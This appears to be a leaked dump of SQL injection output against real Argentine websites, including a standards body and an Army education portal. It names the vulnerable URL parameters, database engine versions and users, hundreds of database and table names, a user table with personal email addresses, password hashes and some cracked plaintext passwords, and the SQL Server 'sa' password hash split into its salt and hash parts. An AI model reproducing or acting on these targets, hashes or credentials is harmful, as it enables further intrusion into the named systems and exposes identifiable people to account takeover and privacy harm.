| 2007-06-04 | 1f3870be274f6c49b3e31a0c6728957f (apple)  | diego@dyw.com.ar         | 41    | 0      | dd-homologa   |
| 2007-06-05 | 1f3870be274f6c49b3e31a0c6728957f (apple)  | NULL                     | 42    | 0      | demo          |
| 2008-07-01 | dba3aee073b77ca41377a2e343791a16          | diego.dalessio@gmail.com | 44    | -1     | gaby          |
| 2009-08-18 | 84d7f900b0d115e563160d69491b7abc          | horaciocorral@gmail.com  | 46    | 0      | horaciocorral |
| 2010-11-16 | 9a871a2a1b44ce36da856605dd3c446c (laura1) | lbinotti@sadaic.org.ar   | 47    | 0      | lbinotti      |
| 2011-09-13 | 5e48a96242d6f4f30ef293f9366af617          | gmyndlis@quomusica.com   | 48    | 0      | root          |
| 2011-09-13 | b606b647bc932d8294437c2f177233f6          | vyunesc@sadaic.org.ar    | 49    | 0      | vyunesc       |
+------------+-------------------------------------------+--------------------------+-------+--------+---------------+

Parámetro Vulnerable:
http://www.iram.org.ar/seccion.php?ID=

Motor de Base de Datos:
Microsoft SQL Server 2005 - 9.00.5057.00 (Express Edition)

Usuarios de Motor de Base de Datos (2):

[*] cearorsql
[*] sa

Bases de Datos (297):

[*] aleks4
[*] alfar4
[*] algham0005
[*] algham0008
[*] allac50002
[*] althau
[*] althau0001
[*] althau0002
[*] althau0003
[*] althau0004
[*] amuzei
[*] amuzei0001
[*] anbpa2
[*] archpa
[*] arcsee
[*] asqfo1
[*] aticou
[*] axilon
[*] baetac
[*] baetac0002
[*] bandem
[*] belpro
[*] biddes
[*] bike24
[*] bilokr
[*] bla569
[*] blxcom
[*] bokumc
[*] bootup
[*] botelh
[*] bount4
[*] bra165
[*] brock9
[*] bronea
[*] btsfun0001
[*] camph1
[*] carem2
[*] cearor
[*] celamt
[*] cellma
[*] cellma0003
[*] cellma0006
[*] cellma000a
[*] cellma000e
[*] cen485
[*] cha545
[*] cha5450001
[*] chai11
[*] chasi8
[*] chi445
[*] chi4450001
[*] chi4450004
[*] citi45
[*] cixse1
[*] cixse10001
[*] cixse10002
[*] cixse10003
[*] cixse10005
[*] cixse10008
[*] cnwzwi0001
[*] cobr12
[*] col745
[*] con646
[*] cosm99
[*] crmmar
[*] cwpart
[*] des583
[*] dewapo
[*] dgcom00006
[*] dncrem
[*] dockal
[*] dockal0002
[*] doll500001
[*] domete
[*] dormae
[*] drozus
[*] ecomp4
[*] ejrund0001
[*] ekstei
[*] elater0001
[*] elater0002
[*] ellwoo
[*] essdoc0001
[*] evolu3003e
[*] exce68
[*] exot47
[*] exot470003
[*] expl81
[*] fact40
[*] fan126
[*] feconc
[*] ffmwoc
[*] flock10001
[*] forkl9
[*] fre5970003
[*] fre626
[*] frwrdc
[*] fslsoo
[*] galil5
[*] gambit
[*] gent25
[*] ghana3
[*] gideo7
[*] giswir0001
[*] gl10280003
[*] gmdrxc
[*] groo33
[*] hand73
[*] hann27
[*] hendr1
[*] hot212
[*] hot2120006
[*] hvacwe
[*] icpref
[*] ihavep
[*] indula
[*] infoho
[*] ingr18
[*] ins2770001
[*] ins458
[*] ispqco0020
[*] ixesec
[*] jaiban0001
[*] jam1730002
[*] jam1730008
[*] jam173000a
[*] jam173000c
[*] jdsaw30003
[*] joh3430001
[*] kaiste0001
[*] kcorg0
[*] kitssc
[*] klwmet
[*] lak101
[*] leuthe
[*] lfgtec
[*] lib117
[*] loc1970001
[*] logikt
[*] lupinw
[*] lwechu
[*] lyman1
[*] macgr4
[*] magik2
[*] magmat
[*] masona
[*] master
[*] matr92
[*] medant
[*] mexven0005
[*] mexven0006
[*] mircet
[*] miss68
[*] model
[*] motech
[*] motech0001
[*] mottca
[*] movist
[*] movist0001
[*] msdb
[*] mwmodu0001
[*] mwmull
[*] mwmull0001
[*] mwmull0004
[*] mycat2
[*] myfr17
[*] nant15
[*] newre7
[*] nhdnug
[*] nidaan
[*] njspeo
[*] norbar
[*] nssdev
[*] nutr68
[*] operon
[*] ordusi
[*] orgul2
[*] paddl8
[*] palm86
[*] par3690003
[*] parwa1
[*] peo1140005
[*] peo1140009
[*] perfpl
[*] pestma
[*] pestof
[*] pgaima
[*] pho437
[*] pinoys
[*] play90
[*] plea86
[*] plexu80003
[*] por1620003
[*] proa30
[*] proa30000a
[*] proa300010
[*] propue
[*] pussi3
[*] quasi3
[*] rad152
[*] radham
[*] rafiqu
[*] rarecu
[*] rateso
[*] rcdeve
[*] rcfoou
[*] reco660001
[*] redaba
[*] redbr4
[*] reqsol
[*] revo510001
[*] richey
[*] richey0001
[*] rigide
[*] rinkco
[*] risi31
[*] risris
[*] rivive
[*] romell
[*] romeop
[*] romeop0003
[*] sabmec
[*] sabmec0001
[*] sanumb
[*] sctedc
[*] ser200
[*] sewar1
[*] sewar10001
[*] sfeapa
[*] sha253
[*] shipl3
[*] shipl30002
[*] shoree0002
[*] siltim
[*] snide2
[*] soflib
[*] sotel1
[*] spoto10001
[*] sta293
[*] sta359
[*] sta3590001
[*] subone
[*] svgncb
[*] sysvue
[*] tcctur
[*] tec314
[*] tempc8
[*] tempdb
[*] th3089
[*] th43330002
[*] th4762
[*] th5229
[*] the782
[*] tierca0001
[*] tlewi2
[*] tlewi20001
[*] tra783
[*] trai73
[*] trai730015
[*] trai730016
[*] trai730017
[*] trai730018
[*] trai73001b
[*] trai73001c
[*] truec8
[*] ult176
[*] unnig2
[*] urban8
[*] vitakk
[*] voiddw0002
[*] voiddw0004
[*] voiddw0006
[*] walt26
[*] webw27
[*] webw270001
[*] webw270002
[*] webw270003
[*] webw270004
[*] webw270005
[*] webw270006
[*] webw270007
[*] webw27000f
[*] webw270011
[*] webw270012
[*] webw270014
[*] webw270015
[*] webw270017
[*] webw270019
[*] webw27001a
[*] wil254
[*] win155
[*] winqar0001
[*] winqav
[*] winsql0001
[*] wrapma
[*] zetuti0001
[*] zetuti0002

Tablas de cearor (56):

+----------------------------+
| dbo.ACTITUD                |
| dbo.ACTOR                  |
| dbo.ACTOR_HISTORY          |
| dbo.ACTOR_NEWS             |
| dbo.CATEGORIA              |
| dbo.CONTACTO               |
| dbo.CancelacionesSis       |
| dbo.Cert3810SV             |
| dbo.Cert42100Balnearios    |
| dbo.Cert90600              |
| dbo.CertAgroalimentos      |
| dbo.CertCompPers           |
| dbo.CertEND                |
| dbo.CertElectrica          |
| dbo.CertElectricaRenuncias |
| dbo.CertGas                |
| dbo.CertISO13485           |
| dbo.CertISO14001           |
| dbo.CertISO29001           |
| dbo.CertISO9001            |
| dbo.CertISOTS16949         |
| dbo.CertNCH2728            |
| dbo.CertNCH2909            |
| dbo.CertOHSAS18001         |
| dbo.CertProductos          |
| dbo.CertRSC                |
| dbo.CertSYBC               |
| dbo.CertSistemas14000      |
| dbo.CertSistemas18000      |
| dbo.CertSistemas9000       |
| dbo.CertTL9000             |
| dbo.CertTodas              |
| dbo.Certificaciones        |
| dbo.ENDprovi               |
| dbo.ESTRATEGIA             |
| dbo.IMPORTANCIA            |
| dbo.ISprovi                |
| dbo.MINUTA                 |
| dbo.MINUTA_ACTOR           |
| dbo.Recomendados           |
| dbo.Reuniones              |
| dbo.Socios                 |
| dbo.USR                    |
| dbo.iram_administradores   |
| dbo.iram_blog              |
| dbo.iram_comentarios       |
| dbo.iram_contactos         |
| dbo.iram_envios            |
| dbo.iram_eventos           |
| dbo.iram_home              |
| dbo.iram_informacion       |
| dbo.iram_inscripcion       |
| dbo.iram_menus             |
| dbo.iram_newsletters       |
| dbo.iram_secciones         |
| dbo.sysc                   |
+----------------------------+

Parámetro Vulnerable:
http://www.seadea.ejercitoargentino.mil.ar/CursosInscripciones2/Inscripcion/inscripcion.php?idPreInscripcion=

Motor de Base de Datos:
Microsoft SQL Server 2000 - 8.00.2039

Usuarios de Motor de Base de Datos (3):

[*] BUILTIN\\Administradores
[*] ISARA\\Administrador
[*] sa (DBA)

Password Hashes de Usuarios de Motor de Base de Datos (1):

[*] sa [1]:
    password hash: 0x0100ef21503c501c43ec8b416654f5088cbd42d70fcc28584df6640353f1c07e84ca6fc70848a3a48e8060371fb3
        header: 0x0100
        salt: ef21503c
        mixedcase: 501c43ec8b416654f5088cbd42d70fcc28584df6
        uppercase: 640353f1c07e84ca6fc70848a3a48e8060371fb3

Bases de Datos (11):

[*] "Chat-2008"
[*] AccesosGral
[*] Correo
[*] Espacios
[*] master
[*] model
[*] msdb
[*] Pruebas
[*] Seadea
[*] tempdb
[*] veedores

Tablas de Seadea (189):

+---------------------------------------+
| dbo.Accesos                           |
| dbo.AlumnosAulas                      |
| dbo.AlumnosCarrera                    |
| dbo.AlumnosNotas                      |
| dbo.AreaMenu                          |
| dbo.AuditTrail                        |
| dbo.Aulas                             |
| dbo.AulasCarreras                     |
| dbo.BaseConocimiento                  |
| dbo.Campus                            |
| dbo.Carreras                          |
| dbo.Contactos                         |
| dbo.ContactosGenerales                |
| dbo.Coordinador_carrera               |
| dbo.Correo                            |
| dbo.Cursos                            |
| dbo.Encuesta                          |
| dbo.Est                               |
| dbo.Exa_Online_Alumno                 |
| dbo.ExamenApareamientoAPH5P           |
| dbo.ExamenOnlineAH5P                  |
| dbo.ExamenOnlineOH5P                  |
| dbo.ExamenOnlinePreguntasVF           |
| dbo.ExamenOpcionesNumerosAPH5P        |
| dbo.ExamenPreguntas                   |
| dbo.ExamenRespuesta                   |
| dbo.Examenes                          |
| dbo.ExamenesActivos                   |
| dbo.ExamenesExpedidosArchivos         |
| dbo.ExamenesInscripciones             |
| dbo.ExamenesPreguntasTablas           |
| dbo.ExamenesPresenciales              |
| dbo.ExamenesRespondidosArchivos       |
| dbo.Examenes_Opciones_Choice          |
| dbo.Examenes_Preguntas_choice         |
| dbo.Examenes_Preguntas_seleccionar    |
| dbo.ForoAulas                         |
| dbo.ForosActivos                      |
| dbo.ForosDatos                        |
| dbo.Fuerza                            |
| dbo.Grados                            |
| dbo.HCActivas                         |
| dbo.HRActivas                         |
| dbo.HojaAvanzada                      |
| dbo.HojaAvanzadaArchivos              |
| dbo.HojaAvanzadaColDestinatarios      |
| dbo.HojaAvanzadaColResumen            |
| dbo.HojaAvanzadaColaborativa          |
| dbo.HojaAvanzadaConcepto              |
| dbo.HojaAvanzadaDestinatarios         |
| dbo.HojaAvanzadaRespuesta             |
| dbo.HojaAvanzadaTipo                  |
| dbo.HojaAvanzadacolArchivos           |
| dbo.HojaAvanzadacolRespuesta          |
| dbo.Materias                          |
| dbo.MateriasInscripciones             |
| dbo.MateriasProfesores                |
| dbo.Mensajesnew                       |
| dbo.Meses                             |
| dbo.MetodoExamen                      |
| dbo.Notas                             |
| dbo.Notas_online                      |
| dbo.Paises                            |
| dbo.Pasantias                         |
| dbo.Provincias                        |
| dbo.Respuestasnew                     |
| dbo.Roles                             |
| dbo.Soporte1                          |
| dbo.Soporte2                          |
| dbo.SoporteArchivo                    |
| dbo.SoporteArchivo1                   |
| dbo.SoporteUsuarios                   |
| dbo.SubAreaMenu                       |
| dbo.TipoCalificacion                  |
| dbo.TipoCarrera                       |
| dbo.TipoDocumento                     |
| dbo.TipoExamen                        |
| dbo.TipoInscripcion                   |
| dbo.TopicosActivos                    |
| dbo.Upload                            |
| dbo.Usuarios                          |
| dbo.UsuariosCampus                    |
| dbo.UsuariosDatos                     |
| dbo.UsuariosMenu                      |
| dbo.VideoConferencias                 |
| dbo.anios                             |
| dbo.archivosRespuesta                 |
| dbo.archivosTopico                    |
| dbo.area_soporte                      |
| dbo.area_soporte_usuario              |
| dbo.areamenu_optmenu                  |
| dbo.areasMenu                         |
| dbo.areasmenu_tipoUSR                 |
| dbo.arma                              |
| dbo.aulasActivas                      |
| dbo.bibliotecas                       |
| dbo.calendario                        |
| dbo.carrerasActivas                   |
| dbo.categoriaMensajeInicio            |
| dbo.contactosGenerales_usuarios       |
| dbo.correlatividades                  |
| dbo.correoSeadea                      |
| dbo.curso                             |
| dbo.cursoIngreso                      |
| dbo.datosJElem                        |
| dbo.datosRespOp                       |
| dbo.dtproperties                      |
| dbo.enlaces                           |
| dbo.error                             |
| dbo.errorCorreccion                   |
| dbo.errorDescripcion                  |
| dbo.errores                           |
| dbo.exa_online_alumnoCorreccion       |
| dbo.exa_online_alumno_textos          |
| dbo.exa_online_alumno_textos1         |
| dbo.exa_online_alumno_textos2         |
| dbo.examenMetodos                     |
| dbo.examenOnlineAPH5P                 |
| dbo.examenOpcionesLetrasAPH5P         |
| dbo.examenPreguntaAPH5P               |
| dbo.examen_online_log                 |
| dbo.examenesDestinatarios             |
| dbo.examenesOnlineAH5P                |
| dbo.examenesOnlineAH5P1               |
| dbo.examenesOnlineArchivosAH5P        |
| dbo.examenesOnlineTextosAH5P          |
| dbo.examenesOnlineTextosAH5P1         |
| dbo.foros                             |
| dbo.forosArchivosRespuestasLog        |
| dbo.forosArchivosTopicoLog            |
| dbo.forosRespuetasLog                 |
| dbo.forosTopicoLog                    |
| dbo.forosnew                          |
| dbo.fotos                             |
| dbo.grupoDeCorreo                     |
| dbo.hojaAvanzadaGrupos                |
| dbo.infodatosceea                     |
| dbo.inscripcionCEU                    |
| dbo.inscripciones                     |
| dbo.inscripcionesISA                  |
| dbo.inscripcionesceea                 |
| dbo.inscripcionesiese                 |
| dbo.inscriptoCurso                    |
| dbo.inscriptoCurso1                   |
| dbo.inscriptoCurso2                   |
| dbo.item                              |
| dbo.materiasActivas                   |
| dbo.mensajeIniTmp                     |
| dbo.mensajeInicio                     |
| dbo.menu                              |
| dbo.menu_campus                       |
| dbo.menu_coordinador                  |
| dbo.menu_usr                          |
| dbo.notaManual                        |
| dbo.notas_online_Concepto             |
| dbo.optmenu                           |
| dbo.paises1                           |
| dbo.paraAdjuntarArchivosDestinatarios |
| dbo.personaDesignada                  |
| dbo.personaValida                     |
| dbo.porcentajes                       |
| dbo.preInscripcion                    |
| dbo.preInscripcion1                   |
| dbo.preInscripcionAdjunto             |
| dbo.pregunta                          |
| dbo.preguntaEncuesta                  |
| dbo.preguntaPreInscripcion            |
| dbo.preguntaPreInscripcion1           |
| dbo.pruebaIdentity                    |
| dbo.pruebaIdentity1                   |
| dbo.registracionCEEA                  |
| dbo.respuestaCheckBox                 |
| dbo.respuestaEncuesta1                |
| dbo.respuestaPreguntaPreInscripcion   |
| dbo.respuestaPreguntaPreInscripcion1  |
| dbo.respuestaRadioButton              |
| dbo.soporte                           |
| dbo.subMenu                           |
| dbo.sysconstraints                    |
| dbo.syssegments                       |
| dbo.ticket                            |
| dbo.tipoPregunta                      |
| dbo.tipoRespuesta                     |
| dbo.tipoUsuarios                      |
| dbo.tipoevento                        |
| dbo.tutorAula                         |
| dbo.usuario                           |
| dbo.usuariosActivos                   |
| dbo.usuariosOnline                    |
+---------------------------------------+